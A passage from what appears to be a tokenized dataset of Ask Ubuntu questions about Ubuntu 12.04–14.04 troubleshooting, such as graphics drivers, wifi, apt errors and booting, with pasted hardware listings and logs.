00:1d.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 1 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 90 ) 00:1f.0 isa bridge : intel corporation 82801jir ( ich10r ) lpc interface controller 00:1f.2 sata controller : intel corporation 82801ji ( ich10 family ) sata ahci controller 00:1f.3 smbus : intel corporation 82801ji ( ich10 family ) smbus controller 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv635 [ radeon hd 3650/3750/4570/4580 ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] rv635 hdmi audio [ radeon hd 3600 series ] 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 02 ) 04:00.0 pci bridge : creative labs [ sb x-fi xtreme audio ] ca0110-ibg pci to pcie bridge 05:00.0 audio device : creative labs [ sb x-fi xtreme audio ] ca0110-ibg glxinfo is too long to fit , so i popped it into the ubuntu pastebin . * i hate skype , but i need it for work .
469528	install native-bzip2 on ubuntu 14.04	i have recently tried to build hadoop 2.4 to use it 's native libraries . and when i check that if hadoop is really using it . i get the following warning : warn bzip2.bzip2factory : failed to load/initialize native-bzip2 library system-native , will use pure-java version so i tried to look for the native-bzip2 library with apt-cache and i got the following : lib32bz2-1.0 - high-quality block-sorting file compressor library - 32bit runtime libbz2-1.0 - high-quality block-sorting file compressor library - runtime lib64bz2-1.0 - high-quality block-sorting file compressor library - 64bit runtime i have tried to install lib64bz2-1.0 and libbz2-1.0 but both did n't contains the native-bzip2 library . any suggestion on how to do it is welcome ? or even any explanation that what i am trying to do is a complete non-sense . thanks .
469534	lubuntu and xp file transfer	i now have lubuntu and xp on my laptop so i am wondering how ( if ) i can transfer files etc from xp to lubuntu . i realize i could write them all to disc and then presumably load into lubuntu but i am hoping there is an easier way . sudo fdisk -l disk /dev/sda:40.0gb 40007761920 bytes 255 heads . 63 sectors/track , 4864 cylinders . total 78140160 sectors units = sectors of 1 * 512 + 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcccdcccd device boot start end blocks id system /dev/sda1 * 63 54523363 27261650+ 7 hpfs/ntfs/exfat /dev/sda2 68871600 78140159 4634280 12 compaq diagnostics /dev/sda3 54523902 68870143 7173121 5 extended /dev/sda5 54523904 67844095 6660096 83 linux /dev/sda6 67846144 68870143 512000 82 linux swap /solaris partition tables are not in disk order
469535	nvidia sli multimonitor	i have two geforce 7800 gt on legacy nvidia binaries 304.117 in 14.04 . progress so far . got both gpus to recognise all 4 monitors ( two on each gpu ) . if i run each gpu on its own screen ( i.e . monitor0 & 1 [ off gpu0 ] on screen0 and monitor 2 & 3 [ gpu1 ] on screen1 ) screen 1 is screwed up in unity ( no wallpaper , no panels , and even though i can move the cursor it comes up as a big x ) same think in lxde but i get a wallpaper on screen1 . i can enable xinerama and i got things to more or less work under lxde , but performance is not that great , and little bugs pop up , like i ca n't change wallpaper and when maximizing a window it goes across both monitors . so my question is how can i run both gpus in sli mode which should fix most of these problems . ( and i do have the sli bridge between both cards ) . $ sudo lshw -c video *-display description : vga compatible controller product : g70 [ geforce 7800 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : fa000000-faffffff memory : c0000000-cfffffff memory : f9000000-f9ffffff ioport : ac00 ( size=128 ) memory : fbde0000-fbdfffff *-display description : vga compatible controller product : g70 [ geforce 7800 gt ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:16 memory : fd000000-fdffffff memory : d0000000-dfffffff memory : fc000000-fcffffff ioport : dc00 ( size=128 ) memory : fe9e0000-fe9fffff $ cat /etc/x11/xorg.conf # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 331.20 ( buildd @ roseapple ) mon feb 3 15:07:22 utc 2014 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 1080 screen 1 `` screen1 '' above `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 1 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` ancor communications inc asus vn248 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor1 '' vendorname `` unknown '' modelname `` ancor communications inc asus vn248 '' horizsync 24.0 - 83.0 vertrefresh 50.0 - 75.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7800 gt '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7800 gt '' busid `` pci:4:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 , dvi-i-3 : nvidia-auto-select +1920+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` metamodes '' `` dvi-i-2 : nvidia-auto-select +0+0 , dvi-i-3 : nvidia-auto-select +1920+0 '' option `` sli '' `` off '' option `` multigpu '' `` off '' option `` basemosaic '' `` off '' subsection `` display '' depth 24 endsubsection endsection section `` extensions '' option `` composite '' `` disable '' endsection i tried the following config but then monitors off of gpu1/screen1 just do n't get a signal section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell 2405fpw '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` monitor '' # horizsync source : unknown , vertrefresh source : unknown identifier `` monitor1 '' vendorname `` unknown '' modelname `` ancor communications inc asus vn248 '' horizsync 0.0 - 0.0 vertrefresh 0.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7800 gt '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 7800 gt '' busid `` pci:4:0:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-0 '' option `` basemosaic '' `` true '' option `` sli '' `` mosaic '' option `` metamodes '' `` gpu-1.dfp-0 : 1920x1080+0+0 , gpu-1.dfp-1 : 1920x1080+1920+0 , gpu-0.dfp-0 : 1920x1200+0+1080 , gpu-0.dfp-1 : 1920x1080+1920+1080 '' subsection `` display '' depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` basemosaic '' `` true '' option `` sli '' `` mosaic '' option `` metamodes '' `` gpu-1.dfp-0 : 1920x1080+0+0 , gpu-1.dfp-1 : 1920x1080+1920+0 , gpu-0.dfp-0 : 1920x1200+0+1080 , gpu-0.dfp-1 : 1920x1080+1920+1080 '' subsection `` display '' depth 24 endsubsection endsection
469547	unity not loading after log in . ccsm wont work	i am using ubuntu 14.04 , and my desktop is gone . after i log in , unity would not start and i am stuck with just a working mouse cursor . i have a hybrid amd-graphic card and i have removed anything related to fglrx ( i think ) by using ctrl + alt + f1 . i re-installled the xserver , ubuntu-desktop , unity . but nothing works . i installed compizconfig-settings manager and tried to enable the unity plugin package , but ccsm wo n't ' load because i get an error saying no protocol specified . no application which requires a gui , works because it says it is not able to connect to the xserver and x11 initialization failed . i tried dconf reset -f /org/compiz/ but that throws an error saying error spawning command line 'dbus-launch . can someone please help me and get my desktop back ? edit : i ran display=:0.0 ccsm i get compizconfig - info : backend : ini compizconfig - info : integration : true compizconfig - info : profile : default [ 690.211258 ] ata1.00 : exception emask 0x0 sact 0x7fffffff serr 0x40000 action 0x0 [ 690.211315 ] ata1.00 : irq_stat 0x400000008 [ 690.212031 ] ata1 : serror : { commwake } [ 690.212747 ] ata1.00 : failed command : read fpdma queued [ 690.213444 ] ata1.00 cmd ____ < some address > _________________ tag 8 ncq 4096 in the error continues , i could not write down everything from the terminal . in the end there was some emask media error and i/o error , dev sda , bus error ( dumpped )
469548	which desktop environment does zorin os use and how to get for ubuntu ?	which is the desktop environment of zorin os and is there any way to get it on ubuntu ?
469550	the boot screen says that some important files are missing	i just installed ubuntu on my windows 8 pc . when i restarted it first displayed that windows had encountered an issue and it does n't know which os to run . i assumed that was normal and hit enter , now it gave me the choice between windows 8.1 and ubuntu . i clicked ubuntu . i do n't know why but my pc just restarted . the dell logo came up and the pc booted . this thing has kept on happening and ubuntu just does n't work . i repaired ubuntu twice and re downloaded and reinstalled it once . the boot screen says that some important files are missing specs : i installed ubuntu 14.04 lts i have windows 8.1 running at the moment . i downloaded the cd from this link my laptop is the dell 14r : 1.8 ghz 4 gb ram + 2 gb ubuntu is set at 32 gb fyi ...
469552	digital tablet which is capable of giving input to my applet ?	i have java project , which is currently developing and will be deployed in ubuntu only . here i need a digital tablet which is having both mouse and pen , which is capable of giving input to my applet in my project . most of digital tablets only supports for windows and apple oses . can there is any digital tablet to meet my above requirements ? ? tanks in advance .
469553	how to install flash plugin on ubuntu 14.04 lts 64-bit version	when i play online videos , they are often interrupted with many blinks and other disturbances . many times i was shown an error message that the flash player crashed . when i tried to install the flash plugin on the command line , this error was displayed . can anyone help me to get out of this conflict ? $ sudo apt-get install flashplugin-installer [ sudo ] password for agha : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem hereâs a full log : ign http : //in.archive.ubunutu.com trusty-updates/restricted translation-en_in ign http : //in.archive.ubunutu.com trusty-updates/universe translation-en_in ign http : //in.archive.ubunutu.com trusty-backports/main translation-en_in ign http : //in.archive.ubunutu.com trusty-backports/multiverse translation-en_in ign http : //in.archive.ubunutu.com trusty-backports/restricted translation-en_in ign http : //in.archive.ubunutu.com trusty-backports/universe translation-en_in fetched 964 kb in 42s ( 22.4 kb/s ) e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? agha @ agha-ga-78lmt-usb3 : ~ $ sudo apt-get install wine1.7 winetricks e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? agha @ agha-ga-78lmt-usb3 : ~ $ sudo dpkg -- configure -a dpkg : error : dpkg status database is locked by another process agha @ agha-ga-78lmt-usb3 : ~ $ sudo apt-get install -f e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
469554	wireless card disappeared in ubuntu 14.04 ( ralink rt2860 )	i have an old advent milano netbook that has been running a light version of win 7 . i decided it was time to give ubuntu a try and installed it on a partition , and it worked perfectly . it is now a couple of weeks later and the wireless card appears to have disappeared . i tried booting back in to win7 to use the device manager , but the card is no longer visible there either . grateful for all assistance .
469555	how to edit a protected file if i have no direct access to the filesystem ?	i changed the brightness of my machine by editing the /etc/rc.local file and adding this line echo 10 > /sys/class/backlight/nv_backlight/brightness before exit 0 . after reboot i can see that it works fine . the problem is , it 's so dark that i ca n't see anything . the screen is completely black . i tried running a live usb to edit the file but i have no write permissions . any ideas on how to resolve this ?
469557	wine has to be removed before installing nvidia-331	i would try the method of this link nvidia-libopencl1-331 has to be removed before installing wine but the problem is i already have wine installed and so here is my problem . i installed wine1.7 pepperlight and playonlinux . the problem would be i could delete these things and reinstall everything , but there should be an easier way . here my error : die folgenden pakete haben unerf체llte abh채ngigkeiten : nvidia-libopencl1-331 : kollidiert mit : libopencl1 kollidiert mit : libopencl1 : i386 ocl-icd-libopencl1 : kollidiert mit : libopencl1 ocl-icd-libopencl1 : i386 : kollidiert mit : libopencl1
469561	lubuntu - disable screen saver ... .for real this time ?	i know this has been asked multiple times . i have tried multiple things , however nothing i seem to do stick . i am trying to disable the screen saver/screen blanking on lubuntu 14.04 . i 've tried the following in rc.local , but nothing seems to actually disable it : xset -dpms xset s off xset -dpms ; xset s off setterm -blank 0 -powerdown 0 echo -ne `` \033 [ 9 ; 0 ] '' > > /etc/issue
469563	can not find downloaded file ( mp4 )	i have downloaded a video file from youtube via command line ( youtube-dl ) but coul n't find it and when i again tried to download the same file the terminal says the file is already downloaded but after rigorous searching of the file in every folder i was unsuccessful.i have only one partition . my o.s is ubuntu13.10 .
469565	touchegg running on a galago ultrapro	i installed touchegg on a galago ultrapro running ubuntu gnome 14.04 and the gestures do n't work . i tried the following on the terminal : $ touchegg reading config from `` /home/aldomann/.config/touchegg/touchegg.conf '' try to make a multitouch gesture . if everything goes well the information about the gesture must appear [ + ] avaliable gesture : name - > flick [ + ] avaliable gesture : name - > drag [ + ] avaliable gesture : name - > pinch [ + ] avaliable gesture : name - > rotate [ + ] avaliable gesture : name - > tap [ + ] avaliable gesture : name - > touch i ca n't appreciate any change when i do gestures with the trackpad . any idea how can i config touchegg to work ?
469569	xdotool does not type for me	xdotool no longer types anything . it worked well a few days ago . for example this command has no outputs ( and no errors ) : xdotool type 'hello world ! ' what is the problem ? i uninstalled and reinstalled it . but nothing was solved . xdotool -- version xdotool version 3.20130506.1
469573	vpn not working after installing linux	i have hp g61 laptop . i 'm a university student and we have pptp vpn connection in the university . yesterday i installed ubuntu 14.04 lts but the vpn is not working . i tried to install elementary os and linux mint but i found the same problem , so what can i do ?
469575	repeated 'authentication required ' for wifi	i recently upgraded to 14.04 and over the last few days , i 'm having frustrating problems while connecting to my home wifi network , one i 've been connecting to without a problem ( with earlier ubuntu versions ) for over a year . windows computers and android devices have no trouble connecting either . the problem is that whenever i connect to the network and enter the correct password , it tries connecting for a little while , and simply gives the the 'authentication required ' dialog box again . i have a lenovo z400 laptop ( wifi works perfectly on windows 8 on the same machine , by the way ) , and a linksys ea4500 router . the 'wireless ' page in the router configuration looks like this ( ssid and passphrase removed ) : http : //imgur.com/0pwhrpo . sudo lshw -class network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 20:89:84 : f1:32:3c size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : d3404000-d3404fff memory : d3400000-d3403fff *-network description : wireless interface product : centrino wireless-n 2230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : c4 serial : 68:17:29 : be:21:2f width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 ip=192.168.1.149 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:46 memory : d3500000-d3501fff sudo lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:0129 realtek semiconductor corp. rts5129 card reader controller bus 001 device 003 : id 8087:07da intel corp . bus 001 device 005 : id 046d : c077 logitech , inc . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 13d3:5170 imc networks bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub also , during while trying to connect , dmesg | grep wlan0 tells me i 've been deauthenticated from < address > ( reason : 2 ) . i 've also tried deleting all my saved networks , reboting and then reconnecting , which sometimes works , but sometimes does n't . can someone please tell me why this is happening , and what i can do to fix it ?
469579	best e-books for learning linux for newbies	i am a new user to linux and i find it 's structure completely different from that of windows . so i want to learn more about linux and how it works . the first things that i want to learn in installing softwares and where those softwares are stored . rights and roles , networking and security are also a key concern in linux . please suggest some good e-books to get started with linux . thank you
469580	matlab installation problem using the guidelines as per https : //help.ubuntu.com/community/matlab	while trying to install matlab following the guidelines as per https : //help.ubuntu.com/community/matlab , i encountered a problem in the first step : sudo : /media/mathworks_r2012a/install : command not found kindly please help me sort this out because i need matlab urgently .
469581	ubuntu 14.04 ethernet networks	on ubuntu 13.10 , i had to ethernet networks configured : 'auto ' and 'work ' . when on my company network , i would manually go up and switch to the 'work ' setting ( which would have the ip address , dns settings.. ) . however , on ubuntu 14.04 , the network manager applet only displays the wireless and vpn settings and not the ethernet settings . i have not found another way to switch the network . ideas ?
469582	how do i set up a local socks proxy that tunnels traffic through ssh ?	assume i have access to an ssh server that supports tunneling , and i am on a pc that is running *ubuntu , how do i set up a local socks proxy that tunnels the traffic through that ssh server before reaching the internet ?
469584	trill for ubuntu	i have a project on testing trill but i do not have the equipement that supports it ( like cisco nexus ) so i was wondering if there is an opensource version that i could install on ubuntu . i found this resource : https : //github.com/virtuor/opentrill but it does not work for me .
469587	ubuntu & mac osx ( install ubuntu touch to tablet , from mac platform )	i know this has probably been asked many times over but here goes : i have a macbook pro 15 '' and an nexus 7 ( 2013 ) tablet . i want to install ubuntu ( touch ) onto the nexus but i do n't have ubuntu on my mac . what i need to know is this , what do i need to run ubuntu on my mac , either by partitioning the hard drive ( i do not want to wipe my osx ! ) or by using an external hdd as the ubuntu drive . i then want to install ubuntu touch onto the nexus 7 . yes , i 'm asking a lot especially as i have no experience with ubuntu and hacking . can you help please ?
469591	boot problem with ubuntu 13.10 or 14.04 on linux	when i start my computer , it shows me a list of three options : `` ubuntu '' , `` advanced options for ubuntu '' , `` system setup '' and when i click on ubuntu to start the screen in most cases just turns purple for a indefinite period of time and in a very small percentage of cases it boots normally . what 's my problem and how can i fix it ?
469601	how can i update my system ?	currently , when i run the update manager in 12.04.1 lts , i get since some weels : how can i update from this state ? update $ sudo apt-get update get:1 http : //at.archive.ubuntu.com precise release.gpg [ 198 b ] ... hit http : //at.archive.ubuntu.com precise-backports/universe translation-en fetched 198 b in 1s ( 146 b/s ) reading package lists ... done w : gpg error : http : //at.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key
469606	software updater not notifying when updates are available	until a couple of months ago , whenever i ran aptdcon -- refresh or sudo apt-get update , if there were updates software updater would pop up showing the updates . this is how my updates are set up : this is no longer happening now . if i run sudo apt-get update no notification pops up even if there are updates available . what is the reason and how to restore update notification ?
469608	kinit : resource temporarily unavailable while getting initial credentials ubuntu server krb5	i am receiving error while test kerberos in ubuntu server 12.04 lts . i am installing samba 4.0.5 ad but unable to complete because of this error . i tried to checked krb5.conf file my fqdn is mention there .
469611	restore attributes of deleted file	i 'm wondering if it is possible to restore attributes of deleted file ( but still opened ) . such as date when it was created , permissions , last modification time etc . recovering deleted file from /proc is n't that hard , but i have n't found any information about restoring that info . could you help me with that ?
469612	how to list packages of a repository section at the command line ?	in synaptic , one can list packages by section . for example , in the image below all packages of the `` amateur radio ( universe ) '' section are listed . how can i get such a list ( edit : with package description ) at the command line ? i need a raw list ; a terminal application like aptitude will not do .
469613	why `` ./ '' is used to run `` .sh '' scripts in unix ?	i am executing a .sh script today . it is executed with prefix `` ./.sh , i am a bit confuse because it is also executed without ./.but why this is required to use ./ could you please explain me that why ./ is used to run .sh scripts ?
469614	gnome 3.12 - external monitor causes error of gnome-settings-daemon	i am using ubuntu 14.04 with gnome 3.12 . when i plug in an external monitor and turn off the internal display , the gnome-settings-daemon crashes with the following message gnomedesktop : error : gnome-rr.c:1709 : gnome_rr_crtc_get_current_rotation : assertion failed : ( crtc ! = null ) it is exactly the error described in this bug report : https : //bugzilla.gnome.org/show_bug.cgi ? id=729128 . the status is `` resolved '' and `` fixed '' but how can i install the bugfix on my system ? thanks for your help !
469617	speed adjustable midi playback	i 'm new to ubuntu , and not well versed in technical issues . as a musician , i practice along with midi files found online , such as on abcnotation , and i need to slow them down at first . preferably they should be set to repeat in a loop , so i can practice as long as desired , without fumbling at controls . is there an app , or a way to set up for this ?
469618	juju deployment error on manually provisioned machine	i am getting the following error , when i try to deploy a service on a manually provisioned machine using juju : juju deploy juju-gui -- show-log 2014-05-20 13:42:31 info juju.cmd supercommand.go:302 running juju-1.18.3-unknown-amd64 [ gc ] 2014-05-20 13:42:31 info juju api.go:242 connecting to api addresses [ j93716.servers.jiffybox.net:17070 ] 2014-05-20 13:42:31 info juju apiclient.go:114 state/api : dialing `` wss : //xxx.xxx.net:17070/ '' 2014-05-20 13:42:31 info juju apiclient.go:124 state/api : connection established added charm `` cs : trusty/juju-gui-2 '' to the environment . 2014-05-20 13:42:46 error juju.cmd supercommand.go:305 can not assign unit `` juju-gui/0 '' to machine : can not assign unit `` juju-gui/0 '' to new machine or container : can not assign unit `` juju-gui/0 '' to new machine : use `` juju add-machine ssh : [ user @ ] < host > '' to provision machines juju status outputs the following : environment : manual machines : `` 0 '' : agent-state : started agent-version : 1.18.3 dns-name : xxx.xxx.xxx.xxx instance-id : 'manual : ' series : precise hardware : arch=amd64 cpu-cores=1 mem=1996m `` 1 '' : agent-state : started agent-version : 1.18.3 dns-name : xxx.xxx.xxx.yyy instance-id : manual : xxx.xxx.xxx.net series : precise hardware : arch=amd64 cpu-cores=1 mem=1996m services : juju-gui : charm : cs : trusty/juju-gui-2 exposed : true units : juju-gui/0 : agent-state : pending did i miss something ?
469619	ubuntu phone - how to install ubuntu in iball smart phones	the specification of iball andi 4.5h smart phone is given below . bb chip : mt 6577 ms board : iball modem ver : maui.11.amd.w12 . 22.sp.v15.p4,2013/03/15 19.57 uboot ver : 2010.06 kernel ver : 3.4.0 ( build der8 @ ubuntu-destop ) ( gcc version 4.6x-google 20120106 ( prerel ease ) ( gcc ) ) # 1 smp preempt fri mar 15 android ver 4.1.1 dual core 1ghz cortex a9 processor ram : 1 gb 4gb internal storage ( approx . 2 gb of built-in storage is utilized by os and applications ) 32gb external micro sd card support 11.43 cm ( 4.5â ) ips qhd ( 960x540 ) high quality display 3g hsupa 5.76mbps hsdpa 7.2mbps ( 2100mhz ) edge / gprs quad band 850/ 900/1800/1900 mhz wi-fi 802.11 b/g bluetooth with a2dp dual sim , dual standby g-sensor proximity sensor light sensor is there any ubuntu phone image suitable for this device ? or is it possible to build a ubuntu rom for this device ? if so , what are the requirements ?
469620	enable onboard and card-based multiple displays ( ati card )	trying to get a quad-display setup running on 14.04 lts . the three displays connected to the card function perfectly . the display connected to the onboard dvi port does not and is not seen in admcccle . here are the components : mobo : ga-a75m-ud2h version f6 card : radeon hd 6750 ( has three displays connected ) lshw -c video | grep configuration pci ( sysfs ) configuration : driver=fglrx_pci latency=0 what else should i be looking at ? thanks
469626	installing ubuntu server on barracuda backup server 490	i am fairly new to ubuntu and linux in general . but i have an old barracuda backup server 490 that i want to re purpose . but barraduca 's rates are pretty steep when it comes to using their hardware . i was wondering if there was any way i could install ubuntu server on the server and use it again for my own use ? any help is appreciated . thank you .
469629	preseed ubuntu installation with full disk encryption	i am trying to set up ubuntu full disk encryption using preseeding . i was able to set things up correctly following the preseed file presented here . but i do not want to provide the default password in the preseed file . is there a way to let ubiquity fall to the screen that asks for the encryption passphrase just like it does when the username is not provided in the preseed file ? when i try to leave the passphrase option empty in the preseed file , i get an error in the installer saying `` an error occured while creating the keyfile '' .
469631	can i use ubuntu as a front end in my network to help add security ?	i still have a few xp machines that i need to keep on my network , i was told i can use ubuntu as a machine to route all my network traffic thru to give the xp systems some added security . can this be done ? any info would be appreciated .
469633	404 on apt-get update	i just did an sudo apt-get update on my ubuntu 12.04 . i wonder how to address the following 404 errors ? i am using only putty to connect to my vps err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main amd64 packages 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ondrej/systemd/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ondrej/systemd/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ondrej/systemd/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
469634	ubuntu compatible pci card	i just built my own computer and installed ubuntu . now , i plan to install a wifi by using a pci card like this one : http : //www.tp-link.in/products/details/ ? model=tl-wn781nd # over . so , my question , is the features say that it only supports windows xp and above , and it appears that the cd that comes with it containing the driver also is an .exe file , so i would like to know whether ubuntu can install a driver for it by itself , or if there is a way to configure this exe driver to install on ubuntu , please tell me ?
469635	ubuntu software center not working and alerts that package catalog needs to be repaired	when i open my ubuntu software center it gives warning that `` items can not be installed or removed until package catalog is repaired . do you want to repair it now '' so i hit repair , but it fails saying `` failed to download packages , check your internet connection '' internet connection seems fine , as i could access the other websites . this is my first time using ubuntu , so please help me out
469636	wpa supplicant error wpa : 4-way handshake failed in wifi direct setup	i am trying to set up wifi direct between two linux machines . i am using atheros 9k cards to set up the connections . i have a problem in the process which i hope you guys can help me . when i run wpa supplicant in both of the parts , i get this : wpa_supplicant -b -d nl80211 -i wlan0 -cp2p.conf -d wpa_supplicant v2.2-devel random : trying to read entropy from /dev/random successfully initialized wpa_supplicant initializing interface 'wlan0 ' conf 'p2p.conf ' driver 'nl80211 ' ctrl_interface 'n/a ' bridge 'n/a' configuration file 'p2p.conf ' - > '/root/p2p.conf' reading configuration file '/root/p2p.conf' ctrl_interface='/var/run/wpa_supplicant' ap_scan=2 update_config=1 device_name='giulia118' p2p_go_ht40=1 priority group 0 id=0 ssid='direct_network' nl80211 : could not add multicast membership for vendor events : -2 ( no such file or directory ) rfkill : initial event : idx=0 type=1 op=0 soft=0 hard=0 rfkill : initial event : idx=1 type=1 op=0 soft=0 hard=0 nl80211 : supported cipher 00-0f-ac:1 nl80211 : supported cipher 00-0f-ac:5 nl80211 : supported cipher 00-0f-ac:2 nl80211 : supported cipher 00-0f-ac:4 nl80211 : supported cipher 00-0f-ac:6 nl80211 : using driver-based off-channel tx nl80211 : interface wlan0 in phy phy0 nl80211 : set mode ifindex 4 iftype 2 ( station ) nl80211 : subscribe to mgmt frames with non-ap handle 0x9fa4380 nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=040a nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=040b nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=040c nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=040d nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=090a nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=090b nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=090c nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=090d nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=0409506f9a09 nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=7f506f9a09 nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=06 nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=0a07 nl80211 : register frame type=0xd0 nl_handle=0x9fa4380 match=0a11 netlink : operstate : ifindex=4 linkmode=1 ( userspace-control ) , operstate=5 ( if_oper_dormant ) nl80211 : driver param= ' ( null ) ' add interface wlan0 to a new radio phy0 nl80211 : regulatory information - country=00 nl80211 : 2402-2472 @ 40 mhz 20 mbm nl80211 : 2457-2482 @ 20 mhz 20 mbm ( no ir ) nl80211 : 2474-2494 @ 20 mhz 20 mbm ( no ofdm ) ( no ir ) nl80211 : 5170-5250 @ 40 mhz 20 mbm ( no ir ) nl80211 : 5735-5835 @ 40 mhz 20 mbm ( no ir ) nl80211 : added 802.11b mode based on 802.11g information wlan0 : own mac address : 04 : f0:21:06:1d:14 wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr= ( nil ) key_idx=0 set_tx=0 seq_len=0 key_len=0 wpa_driver_nl80211_set_key : ifindex=4 ( 